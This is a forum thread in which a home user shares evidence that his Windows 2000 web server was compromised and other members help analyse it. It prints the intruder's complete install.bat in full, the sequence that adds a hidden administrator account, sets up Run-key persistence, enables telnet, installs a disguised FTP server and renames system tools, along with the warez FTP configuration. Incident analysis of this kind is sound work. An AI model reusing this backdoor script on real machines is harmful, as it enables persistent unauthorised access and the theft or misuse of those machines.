Hacked !!!!!!

Hey guys. KapperDog here. Some of you may remember me. I've been a member here for a few years and I read more than I post.

Need a favor, please

I am playing with a web server I set up on my home PC. It runs Win2KPro, Savant Web Server and BulletProof FTP.

The FTP was not running at the time of the hack but Savant was.

I'm not sure if I caught him in progress or if he just left a clue behind by accident but, this morning when I checked the box, it had a CMD window open and this is what was in the box.

Sure looks like I was hacked to me. LOL

Can anyone tell me what damage was done and (most importantly) am I still compromised.

Thanks for everything.

Hey, where's Hogfly? How's his gas? LMAO

Anyway......

Code:

---

C:\WINNT\system32\spool\prtprocs\w32x86>set  key=1

C:\WINNT\system32\spool\prtprocs\w32x86>ver  | find "2000"  1>nul

C:\WINNT\system32\spool\prtprocs\w32x86>if not errorlevel 1 set key=2

C:\WINNT\system32\spool\prtprocs\w32x86>c:

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\svchost.exe

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\servudaemon.ini

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\install.bat

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\dump0n.txt

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\ohq.exe

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\JAsfv.dll

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\JAsfv.ini

C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
prtprocs\w32x86\TzoLibr.dll

C:\WINNT\system32\spool\prtprocs\w32x86>net user GLoB peupo3nn/add  /yes
The user name could not be found.

More help is available by typing NET HELPMSG 2221.


C:\WINNT\system32\spool\prtprocs\w32x86>net LOCALGROUP administrators GLoB /add

There is no such global user or group: GLoB.

More help is available by typing NET HELPMSG 3783.


C:\WINNT\system32\spool\prtprocs\w32x86>net group "Domain Admins" GLoB /add
This command can be used only on a Windows 2000 Domain Controller.

More help is available by typing NET HELPMSG 3515.


C:\WINNT\system32\spool\prtprocs\w32x86>echo REGEDIT4    1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\Windows\CurrentVersion\Run] 1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo  "MDM"="c:\winnt\system32\spool\prt
procs\w32x86\svchost.exe" 1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
ontrolSet\Control\Lsa\]    1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "restrictanonymous"=dword:00000002
  1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\TelnetServer\1.0\]  1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "NTLM"=dword:00000001    1>>ins.reg


C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlS
et001\Services\TlntSvr\]    1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "Start"=dword:00000002    1>>ins.re
g

C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
ontrolSet\Services\LanmanServer\Parameters] 1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareServer"=dword:00000000
1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareWks"=dword:00000000  1>>
ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\Windows NT\CurrentVersion\Winlogon] 1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "DontDisplayLastUserName"=dword:000
00001  1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
ontrolSet\Services\lanmanserver\parameters]  1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>echo "RestrictNullSessAccess"=dword:0000
0001  1>>ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>regedit /S ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>del ins.reg

C:\WINNT\system32\spool\prtprocs\w32x86>svchost.exe /i

C:\WINNT\system32\spool\prtprocs\w32x86>net stop Serv-U
The Serv-U FTP Server service is not started.

More help is available by typing NET HELPMSG 3521.


C:\WINNT\system32\spool\prtprocs\w32x86>net start Serv-U
The Serv-U FTP Server service is starting.
The Serv-U FTP Server service was started successfully.


C:\WINNT\system32\spool\prtprocs\w32x86>net stop tlntsvr
The Telnet service is not started.

More help is available by typing NET HELPMSG 3521.


C:\WINNT\system32\spool\prtprocs\w32x86>net start tlntsvr
The Telnet service is starting.
The Telnet service was started successfully.


C:\WINNT\system32\spool\prtprocs\w32x86>net stop "messenger"
The Messenger service is not started.

More help is available by typing NET HELPMSG 3521.


C:\WINNT\system32\spool\prtprocs\w32x86>net stop "netbios"

The NetBIOS Interface service was stopped successfully.


C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete C$ /y
C$ was deleted successfully.


C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete D$ /y
This shared resource does not exist.

More help is available by typing NET HELPMSG 2310.


C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete E$ /y
This shared resource does not exist.

More help is available by typing NET HELPMSG 2310.


C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete F$ /y
This shared resource does not exist.

More help is available by typing NET HELPMSG 2310.


C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete ADMIN$
Users have open files on ADMIN$.  Continuing the operation will force the files
closed.

Do you want to continue this operation? (Y/N) [N]:

---

The cursor is still flashing at this prompt waiting for a reply.

Any advice?

Thanks again, guys.

well......

Busy little ratbag wasn't he......<s>

Unfortunately you don't seem to have all the activity..... The command history buffer must have begun to overwrite itself..... You do have a few clues though that me help you clean up without a complete format and reinstall.

His password for this hack is peupo3nn

much info and stuff he did is in C:\WINNT\system32\spool\prtprocs\w32x86

There is a batch file in the w32x86 dir called install.bat that is worth looking through.....

There is a txt file called Dump0n.txt that is also worth a close look.

servudaemon.ini might also show some interesting info as would JAsfv.ini

You have a definitive list of the registry changes he made....Undo them

close the services he started

dunno why he would stop netbios..... That's an odd one.....

He deleted your administrative shares.... you should probably leave them deleted unless you use them.

It's up to you if you simply delete the files he put in C:\WINNT\system32\spool\prtprocs\w32x86 or just keep them on a floppy to experiment with.

I'd also put a packets sniffer watching the machine for a few days

Well, it definitely looks like a real hack. It looks like he installed ServU ftp on my box.

This is the first time I've been hacked. Kinda fun. hehe

Although, I want to make sure my entire LAN is not in danger. It would appear he intends to return and steal, not just destroy. (Otherwise, I assume I would have formated HDD's by now.

Hmmmmm? maybe, I should lay in wait. LOL Unfirtunately, I don't know as much as I should about this stuff.

Anyway, I hope you don't mind my multiple posts but, I'm going to post what I find as I find it. If someone want to pick up and help out, I sure would be greatful. Thanks again.

Here is the servUDaemon.ini from the Seru FTP install

Code:

---

[GLOBAL]
Version=3.0.0.17
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBDOq4z0PJw8nAgAERHVtcAhQdWJAU3RybwdFQ0xpUFNF
ProcessID=596
MaxNrUsers=10
CheckAnonPass=1
DirCacheEnable=0
AntiHammer=1
AntiHammerTries=10
AntiHammerBlock=1800
PacketTimeOut=300
[EXTERNAL]
EventHookDLL1=JAsfv.dll
[DOMAINS]
Domain1=0.0.0.0||6969|0nlineHQ|1
[Domain1]
ReplyHello=(¯`·._.·[ 0nline.HQ ]·._.·´¯)
ReplyHelp=(¯`·._.·[ No Help avering ]·._.·´¯)
ReplyNoAnon=(¯`·._.·[ No an0nym0us acc0unt ]·._.·´¯)
ReplyNoCredit=(¯`·._.·[ No en0ught Credits ]·._.·´¯)
ReplySYST=(¯`·._.·[ Hax0r = 0nline.HQ CreW ]·._.·´¯)
ReplyTooMany=(¯`·._.·[ 421: ToO MuCh LeeCheRz / BaCk s00n ]·._.·´¯)
ReplyDown=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
ReplyOffline=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
MaxNrUsers=10
User1=admin|1|0
SignOn=c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
User2=fxp|1|0
User3=leech|1|0
[USER=admin|1]
Password=vv3C067E6E3AD1C12C6D5CF9BE14CD5B19
HomeDir=c:\
AlwaysAllowLogin=1
TimeOut=1000020
Maintenance=System
Access1=c:\|RWAMELCDP
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
Access4=f:\|RWAMELCDP
Access5=g:\|RWAMELCDP
Access6=h:\|RWAMELCDP
Access7=i:\|RWAMELCDP
Access8=j:\|RWAMELCDP
Access9=k:\|RWAMELCDP
Access10=l:\|RWAMELCDP
Access11=m:\|RWAMELCDP
Access12=n:\|RWAMELCDP
Access13=o:\|RWAMELCDP
Access14=p:\|RWAMELCDP
Access15=q:\|RWAMELCDP
Access16=r:\|RWAMELCDP
Access17=s:\|RWAMELCDP
Access18=t:\|RWAMELCDP
Access19=u:\|RWAMELCDP
Access20=v:\|RWAMELCDP
Access21=w:\|RWAMELCDP
Access22=x:\|RWAMELCDP
Access23=y:\|RWAMELCDP
Access24=z:\|RWAMELCDP
[USER=fxp|1]
Password=rjAF7C43174907EE9645895D981D10A046
HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
RelPaths=1
TimeOut=600
Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RWAMLCDP
[USER=leech|1]
Password=khD56952C34B3B066BF0F400BD3D0B2B97
HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
RelPaths=1
TimeOut=600
Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RLP

---

Thanks Tiger. I was looking thru that directory while you were posting. Lottsa neat stuff.

Most interesting is the install.bat file.

So far, all I have done is rename all .exe's and .bat's to .bakexe and .bakbat.

I don't want to delete anything because this is a real opportunity for me to learn but, I'm afraid. LOL

I guess, the 1 thing I should focus on first is how he got in and how to stop him (and other) from returning the same way.

Any suggestions on this? Remember, I'm a newbie. LOL

I have 10 boxes on this LAN and I don't want to loose all 10 of them. LOL

Hmmm, I may be in more trouble than I thought. Well, we shall see.

Anyway, the install.bat

C:\WINNT\system32\spool\prtprocs\w32x86

Code:

---

set  key=1
ver | find "2000" > nul
if not errorlevel 1 set key=2
c:
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll

net user GLoB peupo3nn/add  /yes
net LOCALGROUP administrators GLoB /add
net group "Domain Admins" GLoB /add

echo REGEDIT4  1>>ins.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg 
echo "restrictanonymous"=dword:0000000%key% >> ins.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
echo "NTLM"=dword:00000001 >> ins.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg 
echo "Start"=dword:00000002 >> ins.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
echo "AutoShareServer"=dword:00000000>> ins.reg 
echo "AutoShareWks"=dword:00000000>> ins.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
echo "DontDisplayLastUserName"=dword:00000001>> ins.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg 
echo "RestrictNullSessAccess"=dword:00000001>> ins.reg 

regedit /S ins.reg
del ins.reg
svchost.exe /i
net stop Serv-U
net start Serv-U
net stop tlntsvr
net start tlntsvr
net stop "messenger"
net stop "netbios"
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete ADMIN$
net share /delete IPC$

net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "telnet"
mkdir c:\winnt\Recycled\.glob
cd c:\winnt\system32\
ren net.exe neo.exe
ren tftp.exe neo2.exe
ren ftp.exe neo3.exe
ren at.exe neo4.exe
c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h

---

I've heard of the HQ CreW somewhere before..... I just can't remmber where......

Code:

---

C:\WINNT\system32\spool\prtprocs\w32x86

 Directory of C:\WINNT\system32\spool\prtprocs\w32x86

02/17/2003  11:23p      <DIR>          .
02/17/2003  11:23p      <DIR>          ..
02/02/2003  03:44p              1,685 dump0n.txt
02/07/2003  07:54p              2,541 install.bakbat
01/16/2002  08:07p              69,632 JAsfv.dll
02/06/2003  08:24p              2,739 JAsfv.ini
02/07/2003  02:16p            632,809 ohq.bakexe
02/17/2003  03:53p              2,091 ServUDaemon.ini
02/17/2003  03:44p                584 ServUStartUpLog.txt
12/07/1999  07:00a              6,928 sfmpsprt.dll
02/17/2003  03:54p      <DIR>          stro
02/04/2003  08:45p          1,930,752 svchost.bakexe
10/16/2002  09:07p              36,864 TzoLibr.dll
              10 File(s)      2,686,625 bytes
              3 Dir(s)  108,350,550,016 bytes free

C:\WINNT\system32\spool\prtprocs\w32x86>

---

dumpOn.txt

Code:

---



¨¨°o.O0Oo+====================================+oO0O.o°¨¨
         
                  <-·´¯`·._.·´¯) Info Utilisateur (¯`·._.·´¯`·->

--={ Tu es sur le disque %Disk
--={ Ton ip %IP
--={ Utilisateurs Connectés:                %UNow
--={ Nombre d'utilisateurs Acceptés:  %MaxUsers
--={ Nombre d'utilisateurs connectés depuis le lancement du serveur: %UAll
--={ Utilisateurs connectés sur le serveur durant les dernieres 24H:      %U24h

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

                  <-·´¯`·._.·´¯) Descriptif Serveur (¯`·._.·´¯`·->

--={ Heure Local  %Time
--={ Date Local    %Date
--={ Le serveur est lancé depuis
--={ %ServerDays Jours, %ServerHours Heures, %ServerMins Mins, %ServerSecs Secs

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

                  <-·´¯`·._.·´¯) Statistique Serveur (¯`·._.·´¯`·->

--={ Espace Disque Disponible:        %DFree Ko
--={ Téléchargement Total:                        %ServerKbDown Ko
--={ Envoie Total:                                          %ServerKbUp Ko
--={ Bande Passante Moyenne:            %ServerAvg Ko/sec
--={ Bande Passante Actuelle:              %ServerKBps Ko/sec
--={ Nombres de Fichiés Téléchargés:          %FDown
--={ Nombres de Fichiés Envoyés:                %FUp

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

                  <-·´¯`·._.·´¯) Ratio Stat Serveur (¯`·._.·´¯`·->

--={ Ratio Up :        %RatioUp Ko
--={ Ratio Down :                        %RatioDown  Ko
--={ Credits restant:                                        %RatioCredit

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

---

Kapper: Ya know what's funny....... I was looking at the first printout you posted and thinking to myself "this is scripted".... LOL..... Now I see the install bat it's the exact set of commands in the same order so this was the install bat running.

You are right.... We need to find the way in.... What is the architecture of the network.... like

Internet -> Firewall -> LAN
|
v
DMZ -> Public services

I need to understand where your vulnerabilities are since clearly he had already copied all the files into place and the install bat prior to him running it and there is no evidence of how or where..... What services are available publicly? Kinda everything you can tell me?

If you don't feel comfy doing it that publicly....pm me with the info.

Since he started an FTP service his plan is probably to use your box as some sort of warez server.
I would go with the intrusion detection, packet capturing software.
BTW do you have timestamps for when this happened ?
Do you run a firewall ? (You should)
If you run a firewall you may want to examine the logs. This could give you some info on the whereabouts of the misschief but he is probably proxie-chained.
Also the telnet service gets started. He might have continued his quest from telnet and forgot to terminate the command session.

Try disconnecting the other puters on your network if it is possible and monitor the traffic. This way maybe you can catch him while he is at it.

Just some general advice:
I googled for 'savant webserver' without the quotes and immediatly got atleast ten links to vulnarabilities in it.
Are you aware of this ?
Do you have the latest patches installed ?

Hope this will help.

I don't have a prob doing it pulicly. This is how we all learn to deal with these little kiddies. LOL

This should be good for me (thanks to you). Hopefully, if we keep in in the forum, others will learn too.

OK, I'll describe the network as best I can.

Since we're starting at the begining, maybe you could give me a little immediate advice.

Should I shut the serber down? It's only hosting a couple ebay auctions and some other fun stuff. It's there for me to play with and learn. I would like to leave it up but if you say, I should take it down, I will.

The danger is that I have my home network set up to this and, although, there is nothing of interest there, there is archival data that I would not want to loose.

Does he seem to have access to my entire LAN?

OK. Thanks.. my turn

P4 2.4 /512k RAM/Win2KPro/SP2/Savant Web Server

Cable ISP/Linksys Router (pass not admin)/IP assigned to servere and IP placed in DMZ

Hmmm, I'll bet you're going to slap my wrist for that one. I'll bet I should have done individual port forwarding for the web (80) and the FTP (whatever)

Well, that's what I've got. If you need more, ask.

I hope this will be an enjoyable and learning experience for us all and, I want to say thanks in advance for any participation.

Here's the install.bat

Code:

---

set  key=1
ver | find "2000" > nul
if not errorlevel 1 set key=2
c:
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll

net user GLoB peupo3nn/add  /yes
net LOCALGROUP administrators GLoB /add
net group "Domain Admins" GLoB /add

echo REGEDIT4  1>>ins.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg 
echo "restrictanonymous"=dword:0000000%key% >> ins.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
echo "NTLM"=dword:00000001 >> ins.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg 
echo "Start"=dword:00000002 >> ins.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
echo "AutoShareServer"=dword:00000000>> ins.reg 
echo "AutoShareWks"=dword:00000000>> ins.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
echo "DontDisplayLastUserName"=dword:00000001>> ins.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg 
echo "RestrictNullSessAccess"=dword:00000001>> ins.reg 

regedit /S ins.reg
del ins.reg
svchost.exe /i
net stop Serv-U
net start Serv-U
net stop tlntsvr
net start tlntsvr
net stop "messenger"
net stop "netbios"
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete ADMIN$
net share /delete IPC$

net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "telnet"
mkdir c:\winnt\Recycled\.glob
cd c:\winnt\system32\
ren net.exe neo.exe
ren tftp.exe neo2.exe
ren ftp.exe neo3.exe
ren at.exe neo4.exe
c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h

---

noodle. I have his IP from the Savant log. 80.14.79.43

SamSpade didn't give up much. lol

And, I'm pretty sure that the Linksys router keeps a log by default. I just started playing as a webserver and most of this is pretty new to me.

As far as Savant, I am using version 3.1

Like I said, I just put all this up a few weeks ago and I used all current releases so, I believe I have the latest patches for everything. I'll do that same Google search and see what I find. Thanks for the tip.

This is just my opinion, but if you can divorce this box from the rest of your servers, I'd leave it up and treat it like a honeypot. If it's up, you may be able to catch him/her red-handed and be able to trace the attack. Again, if this is going to put your other systems at risk, you may want to take it off the wire.

Cheers:

I don't have much to tell you about your network's vulnerabilities (I'm just learning) but you DEFINATELY should back up all data you care about now if you haven't already got it backed up. If you haven't got it backed up already, the intruder might have already corrupted it.